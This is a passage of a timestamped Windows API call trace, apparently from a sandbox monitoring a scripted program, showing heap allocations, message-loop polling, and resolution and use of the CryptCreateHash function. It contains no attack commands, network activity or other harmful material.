lpMsg=0x8cf3b8) returned 0 [0210.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0210.642] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0210.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0210.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0210.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0210.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc70 [0210.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0210.643] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0210.643] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0210.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0210.643] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0210.643] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0210.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0210.644] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0210.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0210.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0210.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0210.644] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0210.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0210.644] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e50b48, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0210.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0210.644] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0210.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0210.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0210.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b68 [0210.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0210.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0210.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0210.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0210.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0210.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0210.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0210.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0210.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0210.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0210.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0210.645] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0210.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0210.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0210.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0210.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0210.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0210.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0210.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0210.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0210.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0210.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0210.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0210.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0210.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0210.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0210.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0210.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0210.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0210.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0210.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0210.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0210.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0210.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0210.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0210.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0210.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0210.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0210.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0210.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0210.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0210.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0210.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0210.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0210.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0210.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0210.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0210.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0210.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0210.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0210.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0210.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0210.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0210.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0210.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0210.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0210.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0210.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0210.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0210.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0210.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0210.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0210.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0210.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0210.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0210.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0210.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0210.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0210.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0210.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0210.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0210.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0210.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0210.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0210.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0210.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0210.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0210.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0210.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0210.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0210.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0210.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0210.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0210.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0210.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0210.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0210.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0210.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0210.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0210.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0210.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0210.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0210.649] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 1 [0210.650] TranslateMessage (lpMsg=0x8cf3b8) returned 0 [0210.650] DispatchMessageW (lpMsg=0x8cf3b8) returned 0x0 [0210.650] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0210.650] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0210.650] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0210.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0210.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0210.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0210.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0210.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0210.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0210.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0210.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0210.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0210.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0210.651] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0210.651] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0210.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0210.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0210.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0210.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0210.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0210.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0210.651] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0210.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0210.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0210.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0210.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0210.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0210.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0210.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0210.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0210.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0210.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0210.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0210.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54d98 [0210.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0210.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0210.652] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0210.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0210.652] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54d18, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0210.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0210.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0210.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0210.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0210.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0210.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0210.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0210.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0210.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0210.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0210.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0210.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0210.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0210.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0210.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0210.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0210.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0210.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0210.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0210.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0210.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0210.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0210.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a68 [0210.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0210.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0210.653] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0210.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977998 [0210.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0210.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0210.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0210.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0210.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0210.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0210.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0210.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0210.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0210.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0210.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0210.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0210.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0210.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0210.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0210.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54df8 [0210.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0210.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0210.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0210.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0210.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0210.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0210.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0210.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0210.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0210.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0210.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0210.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0210.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0210.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0210.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0210.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0210.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0210.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977998 | out: hHeap=0x970000) returned 1 [0210.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0210.655] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0210.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0210.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0210.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c08 [0210.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cf8 [0210.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0210.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0210.655] HeapFree 